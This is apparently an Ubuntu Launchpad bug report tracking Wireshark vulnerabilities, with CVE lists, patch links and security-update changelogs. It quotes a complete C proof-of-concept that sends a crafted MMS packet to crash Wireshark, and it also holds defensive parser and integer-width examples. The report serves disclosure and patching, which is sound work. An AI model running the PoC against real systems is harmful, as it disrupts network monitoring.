WireShark versions prior to 0.99.6 vulnerability

Bug #132915 reported by Kyle M Weller
Affects              Status          Importance   Assigned to        Milestone
wireshark (Ubuntu)   Fix Released    High         Stephan Rügamer
  Dapper             Declined for Dapper by Kees Cook
  Edgy               Fix Released    High         Stephan Rügamer
  Feisty             Fix Released    High         Stephan Rügamer

Bug Description

Update WireShark in repos to 0.99.6 or newer

pasted page from securiteam...
http://www.securiteam.com/securitynews/5YP0B1PMAW.html
Vulnerable Systems:
* WireShark versions prior to 0.99.6

Immune Systems:
* WireShark version 0.99.6

WireShark crashes when parsing an MMS message whose Content-Type is application/vnd.wap.multipart.mixed and whose multipart content has a header length equal to 0x00.

Solution:
Update to WireShark version 0.99.6

Exploit:
//main.cpp
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   // exit, atoi
#include <string.h>   // memset, strcpy, strlen, memcpy

#pragma comment(lib, "ws2_32")

// HTTP request line and outer MMS content type; the binary MMS body follows Content-Length
char *http =
    "POST / HTTP/1.0\r\n"
    "Content-Type: application/vnd.wap.mms-message\r\n";

char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";

unsigned char mms[] =
{
    0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
    0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
    0x8d,0x92,//X-Mms-MMS-Version: 1.2
    0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30, 0x30,0x30,0x00,//To: 13510000000
    0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
    //////////////////////////////////////////////////
    0x01,//multipart, count (nEntries)
    0x0f,//HeadersLen
    0x05,//DataLen
    0x00,//headlen <<<=== If this is 0x00, Wireshark crashes. The real value is the length of the following three lines of bytes, 0x0e
    ///
    0x83,0x85,//Content-Type: text/plain (0x83), parameter Name (0x85)
    0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,// Name: zwell.txt
    0x81,0xea,//Charset: utf-8
    ///
    0x7a,0x77,0x65,0x6c,0x6c,//zwell (part data, DataLen bytes)
};

SOCKET connect_to_host(char *h, int p)
{
    SOCKET sock;
    struct hostent *host;
    struct sockaddr_in saddr;

    if((host=gethostbyname(h))==NULL)
    {
        printf("resolv host %s error\n", h);
        exit(-1);
    }

    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("create socket error\n");
        exit(-1);
    }
    memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family=AF_INET;
    saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
    saddr.sin_port=htons(p);
    if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
    {
        printf("connect to host %s on port %d error\n", h, p);
        exit(-1);
    }

    return sock;
}

void socket_init()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2,0), &wsaData);
}

int main(int argc, char **argv)
{
    SOCKET s;
    char sendbuf[1024];   // header lines plus the 36-byte MMS body fit comfortably
    int len = 0;

    printf("WireShark<0.99.6 MMS protocol DOS PoC\nCoded By ZwelL\nhttp://www.nosec.org\n");
    if(argc != 3)
    {
        printf("usage : %s <host> <port>\n", argv[0]);
        exit(-1);
    }
    socket_init();
    s = connect_to_host(argv[1], atoi(argv[2]));

    // Assemble request line, Host, Content-Length and the binary body in one buffer
    strcpy(&sendbuf[len], http);
    len += strlen(http);

    sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2]));
    len = strlen(sendbuf);

    sprintf(&sendbuf[len], contentlenstr, sizeof(mms));
    len = strlen(sendbuf);

    memcpy(&sendbuf[len], mms, sizeof(mms));
    len += sizeof(mms);

    send(s, sendbuf, len, 0);

    closesocket(s);
    WSACleanup();

    printf("completed!\n");

    return 0;
}
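
The check a dissector needs for the body above, as an added example written for this page (it is not Wireshark's code and not the upstream packet-mms.c patch): a small parser for the WSP multipart body the PoC sends, which validates nEntries, HeadersLen, DataLen and the Content-Type Value-length against the bytes actually present before using any of them, and rejects the zero-length content type (the 0x00 "headlen") instead of continuing. parse_wsp_multipart() and read_uintvar() are hypothetical names; the two sample buffers are constructed from the multipart section of the PoC's mms[] array; the encoding rules (uintvar, short Value-length 0..30, Length-quote 0x1f, well-known media-type octet >= 0x80) are assumed from the WSP specification, and text-form media types are treated as unsupported to keep the example short.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Outcome of parsing; anything but MP_OK means "reject this body". */
enum mp_status { MP_OK = 0, MP_TRUNCATED, MP_BAD_LENGTH, MP_UNSUPPORTED };

struct mp_result {
    enum mp_status status;
    uint32_t parts;          /* parts fully parsed */
    uint8_t  media_type;     /* first octet of the last part's media type */
    uint32_t extra_hdr_len;  /* header octets after Content-Type (not decoded here) */
    size_t   data_off;       /* offset of the last part's data */
    uint32_t data_len;       /* length of the last part's data */
};

/* WSP uintvar: 7 data bits per octet, high bit set on every octet but the last.
 * Returns octets consumed, or 0 if the buffer ends first or it exceeds 5 octets. */
static size_t read_uintvar(const uint8_t *buf, size_t len, uint32_t *out)
{
    uint32_t v = 0;
    size_t i;
    for (i = 0; i < len && i < 5; i++) {
        v = (v << 7) | (buf[i] & 0x7fu);
        if (!(buf[i] & 0x80u)) { *out = v; return i + 1; }
    }
    return 0;
}

/* Hypothetical bounds-checked parser: nEntries, then per part HeadersLen, DataLen,
 * the Content-Type field (its Value-length is the PoC's "headlen" octet), the
 * remaining headers, and the data. */
struct mp_result parse_wsp_multipart(const uint8_t *buf, size_t len)
{
    struct mp_result r = { MP_OK, 0, 0, 0, 0, 0 };
    size_t off = 0, n;
    uint32_t nentries, i;

    if ((n = read_uintvar(buf, len, &nentries)) == 0) { r.status = MP_TRUNCATED; return r; }
    off += n;

    for (i = 0; i < nentries; i++) {
        uint32_t hdrlen, datalen, ctlen;
        size_t pfx = 1;  /* octets of Value-length prefix before the media type */

        if ((n = read_uintvar(buf + off, len - off, &hdrlen)) == 0) { r.status = MP_TRUNCATED; return r; }
        off += n;
        if ((n = read_uintvar(buf + off, len - off, &datalen)) == 0) { r.status = MP_TRUNCATED; return r; }
        off += n;

        /* Every declared length is checked against what is really left before
         * any of it is read; a truncated body is rejected, not walked. */
        if (hdrlen > len - off || datalen > len - off - hdrlen) { r.status = MP_TRUNCATED; return r; }
        if (hdrlen == 0) { r.status = MP_BAD_LENGTH; return r; }  /* no room for Content-Type */

        /* Content-Type value (assumed WSP forms): 0x80..0xff one well-known media-type
         * octet; 0x00..0x1e short Value-length; 0x1f Length-quote + uintvar. */
        if (buf[off] >= 0x80) {
            r.media_type = buf[off];
            r.extra_hdr_len = hdrlen - 1;
        } else {
            if (buf[off] == 0x1f) {
                if ((n = read_uintvar(buf + off + 1, hdrlen - 1, &ctlen)) == 0) { r.status = MP_TRUNCATED; return r; }
                pfx += n;
            } else if (buf[off] <= 0x1e) {
                ctlen = buf[off];
            } else { r.status = MP_UNSUPPORTED; return r; }  /* text media type: not handled here */

            /* The advisory's case: a zero Value-length means an empty media type, which is malformed. */
            if (ctlen == 0) { r.status = MP_BAD_LENGTH; return r; }
            /* The field must fit inside HeadersLen, or the next header would be read from the data. */
            if (ctlen > hdrlen - pfx) { r.status = MP_BAD_LENGTH; return r; }
            r.media_type = buf[off + pfx];
            r.extra_hdr_len = (uint32_t)(hdrlen - pfx - ctlen);
        }
        off += hdrlen;
        r.data_off = off;
        r.data_len = datalen;
        off += datalen;
        r.parts++;
    }
    return r;
}

/* Constructed samples: the multipart section of the PoC body, first with the
 * 0x0e Value-length the content really has, then with the 0x00 the advisory describes. */
const uint8_t MMS_MULTIPART_OK[] = {
    0x01, 0x0f, 0x05, 0x0e, 0x83, 0x85, 'z','w','e','l','l','.','t','x','t', 0x00,
    0x81, 0xea, 'z','w','e','l','l' };
const uint8_t MMS_MULTIPART_BAD[] = {
    0x01, 0x0f, 0x05, 0x00, 0x83, 0x85, 'z','w','e','l','l','.','t','x','t', 0x00,
    0x81, 0xea, 'z','w','e','l','l' };

int main(void)
{
    struct mp_result a = parse_wsp_multipart(MMS_MULTIPART_OK, sizeof MMS_MULTIPART_OK);
    struct mp_result b = parse_wsp_multipart(MMS_MULTIPART_BAD, sizeof MMS_MULTIPART_BAD);
    printf("well-formed: status=%d parts=%" PRIu32 " media=0x%02x\n", a.status, a.parts, a.media_type);
    printf("zero headlen: status=%d parts=%" PRIu32 "\n", b.status, b.parts);
    return 0;
}
```

The design point is that each length field is compared with the octets remaining before it is consumed, and that a length which cannot advance the cursor (the empty content type) is an error rather than something to skip over, so a crafted body can fail only one way: rejected early.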

Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Well, this is only one of them.....

here is the complete list with fixes...I'm preparing some debdiffs from dapper to feisty. gutsy is clean.

  * SECURITY UPDATE: wireshark has several vulnerabilities:
    + CVE-2007-3389: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service (crash) via a crafted chunked encoding in an HTTP
      response, possibly related to a zero-length payload.
    + CVE-2007-3390: Wireshark 0.99.5 and 0.10.x up to 0.10.14, when running
      on certain systems, allows remote attackers to cause a denial of service
      (crash) via crafted iSeries capture files that trigger a SIGTRAP.
    + CVE-2007-3392: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service via malformed (1) SSL or (2) MMS packets that trigger an
      infinite loop.
    + CVE-2007-3393: Off-by-one error in the DHCP/BOOTP dissector in Wireshark
      before 0.99.6 allows remote attackers to cause a denial of service (crash) via
      crafted DHCP-over-DOCSIS packets.
  * debian/patches/12_secu_0.99.6_r21034.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-http.c?view=log&pathrev=21034)
  * debian/patches/12_secu_0.99.6_r20990.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/wiretap/iseries.c?r1=19814&r2=20990&pathrev=20990)
  * debian/patches/12_secu_0.99.6_r21392.dpatch ,
    12_secu_0.99.6_r21665.dpatch:
    - applied patches from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-ssl.c?r1=21650&r2=21665&pathrev=21665&view=patch)
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-mms.c?r1=21088&r2=21392&pathrev=21392&view=patch)
  * debian/patches/12_secu_0.99.6_r21947.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-bootp.c?r1=21924&r2=21947&pathrev=21947&view=patch)
  * References:
    CVE-2007-3389
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394
    CVE-2007-3390
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1415
    CVE-2007-3392
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1342
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1582
    CVE-2007-3393
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1416

Changed in wireshark:
assignee: nobody → shermann
status: New → In Progress
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

in dapper wireshark was still named ethereal

Michael Bienia (geser)
Changed in wireshark:
importance: Undecided → High
Revision history for this message
William Grant (wgrant) wrote :

Fixed in Gutsy/Hardy by the autosync.

Changed in wireshark:
assignee: nobody → shermann
importance: Undecided → High
status: New → In Progress
assignee: nobody → shermann
importance: Undecided → High
status: New → In Progress
status: In Progress → Fix Released
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Found another CVE hanging:

CVE-2007-4721:
Integer signedness error in the DNP3 dissector in
Wireshark 0.99.5 and earlier allows remote attackers to cause a denial of
service (infinite loop) via a certain DNP3 packet.

The fix is quite easy, reading the explanation on http://archives.neohapsis.com/archives/bugtraq/2007-09/0030.html:

- guint16 al_obj, temp16=0, al_val16=0, al_ctlobj_stat;
- guint32 al_val32, num_items=0, al_ptaddr=0, al_ctlobj_on, al_ctlobj_off;
+ guint16 al_obj, al_val16=0, al_ctlobj_stat;
+ guint32 al_val32, num_items=0, al_ptaddr=0, al_ctlobj_on, al_ctlobj_off, temp16=0;
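
Review bot: the hunk changes only the width of temp16, moving it from the guint16 declaration to the guint32 one; both types are unsigned, so despite the CVE text above calling this a signedness error, what the patch actually prevents is 16-bit wrap-around in whatever loop or length arithmetic uses temp16. The dpatch should carry a one-line comment saying so, otherwise the misleading name temp16 on a 32-bit variable invites a later "cleanup" back to guint16. Since only the declaration is shown, the uses of temp16 in the function should also be checked to confirm none of them assigns the value back into a 16-bit variable, which would reintroduce the truncation.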

Please have a look at temp16... before, it was an unsigned 16-bit int, but it needs to be an unsigned 32-bit int.
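
A worked illustration of why the width of temp16 matters, as an added example (this is not Wireshark's packet-dnp.c and not the upstream patch): a loop bounded by a 32-bit item count taken from the packet but stepped with a 16-bit temporary never terminates once the count exceeds 65535, while the widened counter does. counter_loop_terminates() and bounded_item_count() are hypothetical names, the loop shape is a reconstruction of the pattern rather than the real dissector code, and the STEP_CAP stand-in lets the non-terminating case be observed without hanging the process.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Upper bound on loop steps that stands in for "runs forever". */
#define STEP_CAP 200000u

/* Hypothetical reconstruction of the pattern: a dissector reads a 32-bit item
 * count from the packet and counts up to it with a temporary. Returns 1 if the
 * loop finished, 0 if it hit STEP_CAP without finishing. */
int counter_loop_terminates(uint32_t num_items, int wide_counter)
{
    uint32_t steps = 0;
    if (wide_counter) {
        uint32_t temp32;                       /* the widened variable of the fix */
        for (temp32 = 0; temp32 < num_items; temp32++)
            if (++steps > STEP_CAP) return 0;
    } else {
        uint16_t temp16;                       /* the pre-fix declaration */
        /* temp16 is promoted for the comparison, so 65535 < 70000 holds; the
         * increment then wraps it to 0 and num_items is never reached. */
        for (temp16 = 0; temp16 < num_items; temp16++)
            if (++steps > STEP_CAP) return 0;
    }
    return 1;
}

/* Defence in depth for the same parser: a count read from the packet must also be
 * bounded by the bytes that really follow it, so even a 32-bit counter cannot be
 * driven past the end of the capture. Returns how many items may be processed;
 * a caller treats a result smaller than num_items as a malformed packet. */
uint32_t bounded_item_count(uint32_t num_items, size_t bytes_left, size_t item_size)
{
    size_t max_items = item_size ? bytes_left / item_size : 0;
    return num_items <= max_items ? num_items : (uint32_t)max_items;
}

int main(void)
{
    printf("70000 items, 16-bit counter: %s\n",
           counter_loop_terminates(70000, 0) ? "terminates" : "never terminates");
    printf("70000 items, 32-bit counter: %s\n",
           counter_loop_terminates(70000, 1) ? "terminates" : "never terminates");
    printf("70000 items claimed, 100 bytes of 4-byte items: %u usable\n",
           (unsigned)bounded_item_count(70000, 100, 4));
    return 0;
}
```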

Revision history for this message
Stephan Rügamer (sruegamer) wrote :
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

for edgy all CVEs from 0.99.5 down to 0.99.4 are valid and additionally the following:
CVE-2006-4805
CVE-2006-4574
CVE-2006-5469
CVE-2006-5740
CVE-2006-5468

Revision history for this message
William Grant (wgrant) wrote :

\sh, there are another 4 CVEs affecting Edgy on bug #86908. Additionally, I believe that CVE-2007-3391 affects Edgy and Feisty. ubuntu-cve confirms that that is all of them.

Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Hi,

no, CVE-2007-3391 doesn't affect 0.99.4 and 0.99.3a in feisty and edgy.
The fix is only valid for 0.99.5 which isn't in gutsy, feisty, edgy.

Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Edgy is still affected by:
CVE-2007-0456
CVE-2007-0457
CVE-2007-0458
CVE-2007-0459

which will be fixed by the new debdiff of edgy...

Those CVEs are mentioned as well in #86908
\sh

Revision history for this message
Stephan Rügamer (sruegamer) wrote :
Revision history for this message
Kees Cook (kees) wrote :

These look good. Thanks for digging out all the patches! I've uploaded these to the security queue; they should be published shortly.

Changed in wireshark:
status: In Progress → Fix Committed
status: In Progress → Fix Committed
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

wireshark (0.99.4-6ubuntu0.1) feisty-security; urgency=low

  * SECURITY UPDATE: wireshark has several vulnerabilities:
    (LP: #132915)
    + CVE-2007-3389: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service (crash) via a crafted chunked encoding in an HTTP
      response, possibly related to a zero-length payload.
    + CVE-2007-3390: Wireshark 0.99.5 and 0.10.x up to 0.10.14, when running
      on certain systems, allows remote attackers to cause a denial of service
      (crash) via crafted iSeries capture files that trigger a SIGTRAP.
    + CVE-2007-3392: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service via malformed (1) SSL or (2) MMS packets that trigger an
      infinite loop.
    + CVE-2007-3393: Off-by-one error in the DHCP/BOOTP dissector in Wireshark
      before 0.99.6 allows remote attackers to cause a denial of service (crash) via
      crafted DHCP-over-DOCSIS packets.
    + CVE-2007-4721: Integer signedness error in the DNP3 dissector in
      Wireshark 0.99.5 and earlier allows remote attackers to cause a denial of
      service (infinite loop) via a certain DNP3 packet.
  * debian/patches/12_secu_0.99.6_r21034.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-http.c?view=log&pathrev=21034)
  * debian/patches/12_secu_0.99.6_r20990.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/wiretap/iseries.c?r1=19814&r2=20990&pathrev=20990)
  * debian/patches/12_secu_0.99.6_r21392.dpatch ,
    12_secu_0.99.6_r21665.dpatch:
    - applied patches from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-ssl.c?r1=21650&r2=21665&pathrev=21665&view=patch)
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-mms.c?r1=21088&r2=21392&pathrev=21392&view=patch)
  * debian/patches/12_secu_0.99.6_r21947.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-bootp.c?r1=21924&r2=21947&pathrev=21947&view=patch)
  * debian/patches/13_CVE-2007-4721.dpatch:
    - Applied patch according to the explanation on bugtraq.
      (Link: http://archives.neohapsis.com/archives/bugtraq/2007-09/0030.html)
  * References:
    CVE-2007-3389
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394
    CVE-2007-3390
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1415
    CVE-2007-3392
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1342
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1582
    CVE-2007-3393
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1416
    CVE-2007-4721
    http://archives.neohapsis.com/archives/bugtraq/2007-09/0030.html

 -- Stephan Hermann <email address hidden> Thu, 15 Nov 2007 20:45:17 +0100

Changed in wireshark:
status: Fix Committed → Fix Released
Kees Cook (kees)
Changed in wireshark:
status: Fix Committed → Fix Released